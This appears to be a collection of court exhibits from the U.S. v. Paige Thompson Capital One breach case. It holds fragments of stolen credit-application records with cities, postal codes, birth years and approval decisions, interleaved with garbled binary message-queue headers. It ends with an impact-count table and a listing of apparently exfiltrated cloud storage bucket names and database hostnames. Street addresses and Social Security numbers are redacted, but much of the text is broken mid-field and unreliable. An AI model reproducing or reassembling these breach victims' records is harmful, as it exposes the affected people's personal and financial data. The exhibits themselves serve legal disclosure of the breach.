ressLine2></addressLine2><addressCity>SAINT PETERSBURG</addressCity><addressState>FL</addressState><addressPostalCode>33705</addressPostalCode><dateOfBirth>1994-░░░/dateOfBirth><socialSecurityNumber:░░░░</socialSecuri
.2></addressLine2><addressCity>MEMPHIS</addressCity><addressState>TN</addressState><addressPostalCode>38127</addressPostalCode><dateOfBirth>1986-░░░</dateOfBirth><socialSecurityNumber:░░░░</socialSecurityNumber><decisi



B  B
ØJ₤a§yaTSH  IjI•0      Ⅲ3   Ij      ƁMD      Ɓyyyy     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤ[                                  PNEPTUNE
><decisionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:09:57</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:09:59</decisionTime><decisionResponseCode>DCL</d
ØQ0ⅯzTSH  Ɓtℐ•0       Ⅲ3   Ɓt      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤ]                                  PNEPTUNE
tyNumber><decisionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:09:49</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:09:59</decisionTime><decisionResponseCod
ØḂAoℝƁ ŌTSH  Ɓℝ•0     Ⅲ3   Ɓb      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤ_                                  PNEPTUNE
onSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:01</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:02</decisionTime><decisionResponseCode>DCL</decisionR
B  B
ØDC0ℏhTSH  Ɓiℐ•0     Ⅲ3   Ɓi      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤa                                  PNEPTUNE
isionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:09:56</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:07</decisionTime><decisionResponseCode>DCL</decisi
ØDO0Ɓf=TSH  ƁFℐ•0    Ⅲ3   ƁF      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤc                                  PNEPTUNE
isionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:08</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:09</decisionTime><decisionResponseCode>DCL</decisi
ØO0wⅡₓTSH  Ɓmℐ•0     Ⅲ3   Ɓm      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤe                                  PNEPTUNE
decisionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:09:56</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:10</decisionTime><decisionResponseCode>APP</dec
ØDEⅡₗⅡTSH  Ɓqℐ•0     Ⅲ3   Ɓq      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤg                                  PNEPTUNE
Number><decisionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:10</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:12</decisionTime><decisionResponseCode>
ØEⅼpⅡŌTSH  Ɓpℐ•0     Ⅲ3   Ɓp      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤi                                  PNEPTUNE
er>/decisionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:01</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:13</decisionTime><decisionResponseCode>APP<
ØℱⅠ$ℝℐTSH  Ɓgℐ•0     Ⅲ3   Ɓg      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤk                                  PNEPTUNE
ionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:04</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:15</decisionTime><decisionResponseCode>DCL</decision
ØℤG1ℤ<ℓTSH  Ɓℝ•0     Ⅲ3   Ɓ^      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤm                                  PNEPTUNE
emReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:07</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:17</decisionTime><decisionResponseCode>APP</decisionRespons
ØℤG1ℤ<ℓTSH  Ɓℝ•0     Ⅲ3   Ɓn      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤn                                  PNEPTUNE
Number><decisionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:16</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:18</decisionTime><decisionResponseCode>
ØDK-Ɓ-ℓTSH  Ɓℝ•0     Ⅲ3   Ɓ=      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤq                                  PNEPTUNE
mber><decisionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:17</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:25</decisionTime><decisionResponseCode>DC
ØDP-Ɓℰ7TSH  Ɓiℐ•0    Ⅲ3   Ɓi      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤs                                  PNEPTUNE
ionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:29</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:41</decisionTime><decisionResponseCode>APP</decision
ØℤŁ ℕ oTSH  Ɓoℐ•0    Ⅲ3   Ɓo      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤu                                  PNEPTUNE
r>decisionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:33</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:44</decisionTime><decisionResponseCode>APP</
ØQ0ℐℐTSH  Ɓℝ•0       Ⅲ3   Ɓb      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤw                                  PNEPTUNE
onSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:43</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:45</decisionTime><decisionResponseCode>DCL</decisionR
ØDR=0ℏƁTSH  Ɓmℐ•0    Ⅲ3   Ɓm      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤy                                  PNEPTUNE
<decisionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:32</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:45</decisionTime><decisionResponseCode>APP</de
B  B
ØJ₤xℜℓTSH  Ɓℝ•0      Ⅲ3   Ɓn      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤ{                                  PNEPTUNE
><decisionSystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:40</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:52</decisionTime><decisionResponseCode>APP</d
ØḂÅℤŌTSH  Ɓdℐ•0      Ⅲ3   Ɓd      ƁMD      ƁyyyŁ     Ⅲ  Ƃ₃MQSTR      AMQ PNEPTUNE    Zk$Åł(ℤ}                                  PNEPTUNE
ystemReceivedDate>2018-02-27</decisionSystemReceivedDate><decisionSystemReceivedTime>11:10:44</decisionSystemReceivedTime><decisionDate>2018-02-27</decisionDate><decisionTime>11:10:54</decisionTime><decisionResponseCode>APP</decisionResp

;4</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262947</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerification
PNEPTUNE                          CAPSTONE                        00014604912077883              [CAPSTONE.STREAM.AWS.REQUEST 201802271090000               [       yyyyGMO     ] 0[ 0R
:1:09:55</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerifi
PNEPTUNE                          CAPSTONE                        00014444912435314              [CAPSTONE.STREAM.AWS.REQUEST 201802271090000               [       yyyyGMO     ] 0[ 0R
we>11:09:56</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260781</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVeri

PNEPTUNE                          CAPSTONE                        00014604912077958              [CAPSTONE.STREAM.AWS.REQUEST 201802271090000               [       yyyyGMO     ] 0[ 0R
we>11:09:59</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262946</offerId><approvedCreditLimit> 0</approvedCreditLimit><identityVerif
PNEPTUNE                          CAPSTONE                        00014604912077917              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
:isionTime>11:09:59</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262947</offerId><approvedCreditLimit>300</approvedCreditLimit><ider
PNEPTUNE                          CAPSTONE                        00014444912435348              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
02</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260782</offerId><approvedCreditLimit> 0</approvedCreditLimit><identityVerification

PNEPTUNE                          CAPSTONE                        00014604912077933              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
10:07</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificat
PNEPTUNE                          CAPSTONE                        00014444912435363              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
10:09</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260778</offerId><approvedCreditLimit> 0</approvedCreditLimit><identityVerificat
PNEPTUNE                          CAPSTONE                        00014604912077941              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
:11:10:10</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerifi
PNEPTUNE                          CAPSTONE                        00014604912078006              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
ionTime>11:10:12</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262952</offerId><approvedCreditLimit> 0</approvedCreditLimit><identi
PNEPTUNE                          CAPSTONE                        00014444912435330              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
ime>11:10:13</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260781</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVe
PNEPTUNE                          CAPSTONE                        00014444912435355              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
):15</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificatio
PNEPTUNE                          CAPSTONE                        00014444912435389              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
cisionTime>decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260781</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndica
PNEPTUNE                          CAPSTONE                        00014604912078048              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
ionTime>11:10:18</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262952</offerId><approvedCreditLimit> 0</approvedCreditLimit><identi
PNEPTUNE                          CAPSTONE                        00014604912078055              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
nTime>11:10:29</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identity
PNEPTUNE                          CAPSTONE                        00014444912435371              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
):41</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260781</offerId><approvedCreditLimit>3000</approvedCreditLimit><identityVerificat
PNEPTUNE                          CAPSTONE                        00014444912435389              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
me>11:10:44</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260781</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVer
PNEPTUNE                          CAPSTONE                        00014604912078188              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
45</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262952</offerId><approvedCreditLimit> 0</approvedCreditLimit><identityVerificationI
PNEPTUNE                          CAPSTONE                        00014604912078105              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
>11:10:45</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>500</approvedCreditLimit><identityVerif

PNEPTUNE                          CAPSTONE                        00014444912435397              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
we>11:10:52</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVer
PNEPTUNE                          CAPSTONE                        00014604912078196              [CAPSTONE.STREAM.AWS.REQUEST 201802271100000               [       yyyyGMO     ] 0[ 0R
:/decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262946</offerId><approvedCreditLimit>3000</approvedCreditLimit><identityVerificationIn







ine1>████</addressLine1><addressLine2>████</addressLine2><addressCity>HAMPSHIRE</addressCity><addressState>IL</addressState><addressPostalCode>60140</addressPostalCode><dateOfBirth>1971███</dateOfBirth><socialSecurityNumber>
Line1>████</addressLine1><addressLine2>████/addressLine2><addressCity>WICHITA</addressCity><addressState>KS</addressState><addressPostalCode>67210</addressPostalCode><dateOfBirth>1986██</dateOfBirth><socialSecurityNumb
ine1>████</addressLine1><addressLine2>████addressLine2><addressCity>PHILADELPHIA</addressCity><addressState>PA</addressState><addressPostalCode>19139</addressPostalCode><dateOfBirth>1964███</dateOfBirth><socialSecurityNumb
dressLine1>████addressLine1><addressLine2></addressLine2><addressCity>SAINT PETERSBURG</addressCity><addressState>FL</addressState><addressPostalCode>33705</addressPostalCode><dateOfBirth>1994███</dateOfBirth><socialSecu
ine1>████</addressLine1><addressLine2></addressLine2><addressCity>MEMPHIS</addressCity><addressState>TN</addressState><addressPostalCode>38127</addressPostalCode><dateOfBirth>1986███</dateOfBirth><socialSecurityNumber>
ssLine1>████</addressLine1><addressLine2></addressLine2><addressCity>GARDINER</addressCity><addressState>ME</addressState><addressPostalCode>04345</addressPostalCode><dateOfBirth>1991███</dateOfBirth><socialSecurityNumber>
ne1>████/addressLine1><addressLine2></addressLine2><addressCity>TOLLESON</addressCity><addressState>AZ</addressState><addressPostalCode>85353</addressPostalCode><dateOfBirth>1989-███</dateOfBirth><socialSecurityNumber>
ine1>████</addressLine1><addressLine2></addressLine2><addressCity>CEDARVILLE</addressCity><addressState>MI</addressState><addressPostalCode>49719</addressPostalCode><dateOfBirth>1970-███dateOfBirth><socialSecurityNumber>
ine1>████/addressLine1><addressLine2>████</addressLine2><addressCity>GARDEN GROVE</addressCity><addressState>CA</addressState><addressPostalCode>92843</addressPostalCode><dateOfBirth>1999-███/dateOfBirth><socialSecuri
essLine1>████</addressLine1><addressLine2></addressLine2><addressCity>COWETA</addressCity><addressState>OK</addressState><addressPostalCode>74429</addressPostalCode><dateOfBirth>1995-███</dateOfBirth><socialSecurityNu
sLine1>████</addressLine1><addressLine2></addressLine2><addressCity>STILWELL</addressCity><addressState>OK</addressState><addressPostalCode>74960</addressPostalCode><dateOfBirth>1985███</dateOfBirth><socialSecurityNumber>
ne1>████</addressLine1><addressLine2><addressCity>EVANS</addressCity><addressState>CO</addressState><addressPostalCode>80620</addressPostalCode><dateOfBirth>1957-███/dateOfBirth><socialSecurityNumber>██</
Line1>████</addressLine1><addressLine2>████</addressLine2><addressCity>ALEXANDRIA</addressCity><addressState>VA</addressState><addressPostalCode>22306</addressPostalCode><dateOfBirth>1970-███</dateOfBirth><socialSecuri
ine1>████/addressLine1><addressLine2>████</addressLine2><addressCity>PINE BLUFF</addressCity><addressState>AR</addressState><addressPostalCode>71603</addressPostalCode><dateOfBirth>1968-███</dateOfBirth><socialSecurity
e1>████Y</addressLine1><addressLine2></addressLine2><addressCity>ABINGDON</addressCity><addressState>MD</addressState><addressPostalCode>21009</addressPostalCode><dateOfBirth>1975-███</dateOfBirth><socialSecurityNumber>
ssLine1>████</addressLine1><addressLine2></addressLine2><addressCity>HERRIMAN</addressCity><addressState>UT</addressState><addressPostalCode>84096</addressPostalCode><dateOfBirth>1982███</dateOfBirth><socialSecurityNum
ne1>████k/addressLine1><addressLine2></addressLine2><addressCity>CLEARWATER</addressCity><addressState>FL</addressState><addressPostalCode>33763</addressPostalCode><dateOfBirth>1985███/dateOfBirth><socialSecurityNumber>
ne1>████</addressLine1><addressLine2>████</addressLine2><addressCity>ROCKFORD</addressCity><addressState>IL</addressState><addressPostalCode>61107</addressPostalCode><dateOfBirth>1994-███</dateOfBirth><socialSecurityNumbe
e1>████addressLine1><addressLine2></addressLine2><addressCity>TEMPLE HILLS</addressCity><addressState>MD</addressState><addressPostalCode>20748</addressPostalCode><dateOfBirth>1989███dateOfBirth><socialSecurityNumb
e1>████/addressLine1><addressLine2></addressLine2><addressCity>PRIMGHAR</addressCity><addressState>IA</addressState><addressPostalCode>51245</addressPostalCode><dateOfBirth>1941-███</dateOfBirth><socialSecurityNumber>██

WNIT E</addressLine2><addressCity>HAMPSHIRE</addressCity><addressState>IL</addressState><addressPostalCode>60140</addressPostalCode><dateOfBirth>1971-        </dateOfBirth><socialSecurityNumber>        </socialSecurityNumber><d
ne2        </addressLine2><addressCity>WICHITA</addressCity><addressState>KS</addressState><addressPostalCode>67210</addressPostalCode><dateOfBirth>1986-        </dateOfBirth><socialSecurityNumber        </socialSecurityNumber
bHOME</addressLine2><addressCity>PHILADELPHIA</addressCity><addressState>PA</addressState><addressPostalCode>19139</addressPostalCode><dateOfBirth>1964-        </dateOfBirth><socialSecurityNumber>        </socialSecurityNumber
essLine2></addressLine2><addressCity>SAINT PETERSBURG</addressCity><addressState>FL</addressState><addressPostalCode>33705</addressPostalCode><dateOfBirth>1994-        </dateOfBirth><socialSecurityNumber        </socialSecuri
s2></addressLine2><addressCity>MEMPHIS</addressCity><addressState>TN</addressState><addressPostalCode>38127</addressPostalCode><dateOfBirth>1986        </dateOfBirth><socialSecurityNumber>        </socialSecurityNumber><decisi

ne2></addressLine2><addressCity>GARDINER</addressCity><addressState>ME</addressState><addressPostalCode>04345</addressPostalCode><dateOfBirth>1991-        </dateOfBirth><socialSecurityNumber        </socialSecurityNumber><dec
ne2></addressLine2><addressCity>TOLLESON</addressCity><addressState>AZ</addressState><addressPostalCode>85353</addressPostalCode><dateOfBirth>1989-        </dateOfBirth><socialSecurityNumber        </socialSecurityNumber><dec
line2></addressLine2><addressCity>CEDARVILLE</addressCity><addressState>MI</addressState><addressPostalCode>49719</addressPostalCode><dateOfBirth>1970-        </dateOfBirth><socialSecurityNumber>        /socialSecurityNumber><
ne2>        </addressLine2><addressCity>GARDEN GROVE</addressCity><addressState>CA</addressState><addressPostalCode>92843</addressPostalCode><dateOfBirth>1995        /dateOfBirth><socialSecurityNumber        </socialSecurity
addressLine2></addressLine2><addressCity>COWETA</addressCity><addressState>OK</addressState><addressPostalCode>74429</addressPostalCode><dateOfBirth>1995-        </dateOfBirth><socialSecurityNumber>        </socialSecurityNumb
s2></addressLine2><addressCity>STILWELL</addressCity><addressState>OK</addressState><addressPostalCode>74960</addressPostalCode><dateOfBirth>1985        </dateOfBirth><socialSecurityNumber>        </socialSecurityNumber><decis
addressLine2><addressCity>EVANS</addressCity><addressState>CO</addressState><addressPostalCode>80620</addressPostalCode><dateOfBirth>1957-        /dateOfBirth><socialSecurityNumber        </socialSecurityNumber><decisionSyst
Line2        </addressLine2><addressCity>ALEXANDRIA</addressCity><addressState>VA</addressState><addressPostalCode>22306</addressPostalCode><dateOfBirth>1970-        /dateOfBirth><socialSecurityNumber        </socialSecurity
Line2>        </addressLine2><addressCity>PINE BLUFF</addressCity><addressState>AR</addressState><addressPostalCode>71603</addressPostalCode><dateOfBirth>1968-        </dateOfBirth><socialSecurityNumber        </socialSecurityNu
s2></addressLine2><addressCity>ABINGDON</addressCity><addressState>MD</addressState><addressPostalCode>21009</addressPostalCode><dateOfBirth>1975-        </dateOfBirth><socialSecurityNumber>        /socialSecurityNumber><decis
lressLine2></addressLine2><addressCity>HERRIMAN</addressCity><addressState>UT</addressState><addressPostalCode>84096</addressPostalCode><dateOfBirth>1982        /dateOfBirth><socialSecurityNumber>        /socialSecurityNumbe
:/addressLine2><addressCity>CLEARWATER</addressCity><addressState>FL</addressState><addressPostalCode>33763</addressPostalCode><dateOfBirth>1985-        /dateOfBirth><socialSecurityNumber        </socialSecurityNumber><decisi
ne2>        </addressLine2><addressCity>ROCKFORD</addressCity><addressState>IL</addressState><addressPostalCode>61107</addressPostalCode><dateOfBirth>1994        </dateOfBirth><socialSecurityNumber>        </socialSecurityNumber>

line2></addressLine2><addressCity>TEMPLE HILLS</addressCity><addressState>MD</addressState><addressPostalCode>20748</addressPostalCode><dateOfBirth>1989-        </dateOfBirth><socialSecurityNumber>        </socialSecurityNumber
addressLine2><addressCity>PRIMGHAR</addressCity><addressState>IA</addressState><addressPostalCode>51245</addressPostalCode><dateOfBirth>1941-        </dateOfBirth><socialSecurityNumber        /socialSecurityNumber><decisionS

## CAPITAL ONE – INDIVIDUALS IMPACTED (UNITED STATES ONLY)

| Type of Information Impacted | Approximate Number of Impacted Individuals |
|---|---|
| Name | 97,512,110 |
| Date of Birth | 96,174,434 |
| Self-Reported Income | 96,120,346 |
| Fragments of Transaction Data | 34,349,691 |
| Mailing Address | 20,192,797 |
| Email Address | 19,752,393 |
| Phone Number | 18,783,592 |
| Social Security Number | 117,091 |
| Last Four Digits of Social Security Number | 81,849 |
| Bank Account/Routing Number | 77,598 |
| Username | 52,492 |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 715
Admitted_____

```
apperian
├── [      4096 Mar   7   2019]  app-releases.apperian.com
├── [      4096 Mar   7   2019]  apperian.mike.test.bucket
├── [      4096 Mar   7   2019]  apperian.qa1.dat
├── [      4096 May  27   2019]  apperian.tenableio.eval
├── [      4096 Mar   7   2019]  apperiansaas-cloudtrail
├── [      4096 Mar   7   2019]  artifacts.apperian.com
├── [      4096 Mar   7   2019]  backups.eu-central-1.db.apperian
├── [      4096 Mar   7   2019]  backups.eu-west-1.backup.dat.apperian
├── [      4096 Mar   7   2019]  backups.eu-west-1.db.apperian
├── [      4096 Mar   7   2019]  backups.us-east-1.backup.dat.apperian
├── [      4096 Mar   7   2019]  backups.us-east-1.db.apperian
├── [      4096 Mar   7   2019]  backups.us-east-1.gov.dat.apperian
├── [      4096 Mar   8   2019]  backups.us-east-1.gov.db.apperian
├── [      4096 Mar   7   2019]  backups.us-west-2.db.apperian
├── [      4096 Mar   7   2019]  backups.us-west-2.gov.dat.apperian
├── [      4096 Mar   7   2019]  backups.us-west-2.gov.db.apperian
├── [      4096 Mar   7   2019]  cdn.apperian.com.assets
├── [      4096 Mar   7   2019]  cdn.eu-central-1.cats.apperian.eu
├── [      4096 Mar   7   2019]  cdn.eu-central-1.ease.apperian.eu
├── [      4096 Mar   7   2019]  cdn.eu-central-1.qa2ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.eu-central-1.qa7ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.eu-west-1.cats.apperian.eu
├── [      4096 Mar   7   2019]  cdn.eu-west-1.ease.apperian.eu
├── [      4096 Mar   7   2019]  cdn.eu-west-1.qa2ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.eu-west-1.qa7ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.lrevilla.dev.apperian.com
├── [      4096 Mar   7   2019]  cdn.qa3ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.qa6ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.qaease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-east-1.appstore.tsa.dhs.gov
├── [      4096 Mar   7   2019]  cdn.us-east-1.ease.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-east-1.firstnet.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-east-1.mam.att.com
├── [      4096 Mar   7   2019]  cdn.us-east-1.qa3ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-east-1.qa6ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-east-1.qa8ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-east-1.qaease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-west-2.appstore.tsa.dhs.gov
├── [      4096 Mar   7   2019]  cdn.us-west-2.ease.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-west-2.firstnet.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-west-2.mam.att.com
├── [      4096 Mar   7   2019]  cdn.us-west-2.qa3ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-west-2.qa6ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-west-2.qa8ease.qa.apperian.com
├── [      4096 Mar   7   2019]  cdn.us-west-2.qaease.qa.apperian.com
├── [      4096 Mar   7   2019]  ease.eu-central-1.logging
├── [      4096 Mar   8   2019]  ease.eu-west-1.logging
├── [      4096 Mar   7   2019]  ease.us-east-1.logging
├── [      4096 Mar   7   2019]  ease.us-west-1.logging
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 720
Admitted_____

```
├── [      4096 Mar  7  2019]  ease.us-west-2.logging
├── [      4096 Mar  7  2019]  eu-west-1.apperian-terraform-state
├── [      4096 Mar  7  2019]  logs.apperian.com
├── [      4096 Mar  7  2019]  ova.us-east-1.apperian.com
├── [      4096 Mar  7  2019]  qa.apperian.com
├── [      4096 Mar  7  2019]  qa10ease.qa.apperian.com
├── [      4096 Mar  7  2019]  qa8-elb.apperain.com
├── [      4096 Mar  7  2019]  qa8-elb.apperian.com
├── [      4096 Mar  7  2019]  qa9ease.qa.apperian.com
├── [      4096 Mar  7  2019]  threatstack.apperian.com
├── [      4096 May 27  2019]  us-east-1-apperian-downloads
└── [      4096 Mar  7  2019]  us-east-1-apperian-terraform-state

61 directories, 0 files
```

ease.dump

- aire-db001.apperian.com
- aire-db121.apperian.com
- aire-db601.apperian.com
- test123

- app-releases.apperian.com
- apperian.mike.test.bucket
- apperian.qa1.dat
- apperian.tenableio.eval
- apperiansaas-cloudtrail
- artifacts.apperian.com
- backups.eu-central-1.db.apperian
- backups.eu-west-1.backup.dat.apperian
- backups.eu-west-1.db.apperian
